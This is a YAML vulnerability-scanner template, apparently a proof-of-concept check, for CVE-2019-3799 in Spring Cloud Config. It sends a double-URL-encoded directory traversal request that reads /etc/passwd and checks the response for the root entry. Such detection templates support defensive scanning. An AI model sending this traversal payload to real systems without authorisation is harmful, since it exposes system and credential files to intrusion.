name: yaml-poc-vmware-spring_cloud_config-directory_traversal-CVE-2019-3799
binding: ca2024bb-084c-499b-a9d8-42349d0e3c84
detail:
    author: system_user
    links:
        - https://github.com/mpgn/CVE-2019-3799
        - https://nvd.nist.gov/vuln/detail/CVE-2019-3799
        - https://packetstormsecurity.com/files/152685/Spring-Cloud-Config-2.1.x-Path-Traversal.html
        - https://pivotal.io/security/cve-2019-3799
        - https://vigilance.fr/vulnerability/Oracle-Communications-vulnerabilities-of-April-2022-38100
        - https://www.cybersecurity-help.cz/vdb/SB2022042257
        - https://www.exploit-db.com/exploits/46772
        - https://www.oracle.com/security-alerts/cpuapr2022.html
    vulnerability:
        id: 2214e6f4-9c0c-4bf2-a71d-b862d0c8f8ec
        level: medium
    warning: Harmless
transport: http
rules:
    r0:
        request:
            cache: true
            method: GET
            path: /test/pathtraversal/master/..%252F..%252F..%252F..%252F..%252F..%252Fetc%252fpasswd
            follow_redirects: true
        expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
expression: r0()
